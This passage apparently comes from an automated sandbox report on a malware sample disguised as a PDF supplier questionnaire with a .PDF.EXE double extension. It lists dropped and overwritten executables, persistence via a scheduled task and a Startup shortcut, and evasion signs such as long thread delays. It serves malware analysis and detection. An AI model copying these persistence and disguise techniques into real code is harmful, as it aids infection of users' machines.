Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdate.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\firefox.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\updater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.36.372\GoogleUpdateSetup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to dropped file
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe Jump to dropped file
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe File created: C:\Users\user\AppData\Local\Temp\server_BTC.exe Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe File created: C:\Users\user\AppData\Local\Temp\build.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exe Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Hooking and other Techniques for Hiding and Protection

Source: Possible double extension: pdf.exe Static PE information: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Users\user\AppData\Roaming\52b8592e4ce608d8.bin offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 162304
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735820
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 737280
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1285120
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1286144
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1289427
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735744
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 31704
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Users\user\AppData\Local\Temp\aut72FF.tmp offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Users\user\AppData\Local\Temp\aut72FF.tmp offset: 1290240
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Users\user\AppData\Local\Temp\Sancha offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Users\user\AppData\Local\Temp\Sancha offset: 1310720
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Users\user\AppData\Local\Temp\Sancha offset: 1372160
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Users\user\AppData\Local\Temp\Grinnellia offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Users\user\AppData\Local\Temp\Grinnellia offset: 196608
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Users\user\AppData\Local\Temp\Grinnellia offset: 200704
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 95744
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 669260
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 672768
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 1220608
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 1221632
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 1224840
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 669184
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 53125
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 767488
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 1341004
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 1344512
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 1347720
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 1340928
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 409168
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 94208
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 667724
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 671232
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1219072
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1220096
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1223304
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 667648
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 50277
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\FXSSVC.exe offset: unknown
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE API/Special instruction interceptor: Address: 5463204
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE API/Special instruction interceptor: Address: 5333204
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 1770000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 30D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 50D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2FB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 3220000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 3140000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 1048
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 8792
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{3007B876-EF79-48CC-9A41-17D9D214FFC1}\GoogleUpdateSetup.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateBroker.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdate.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
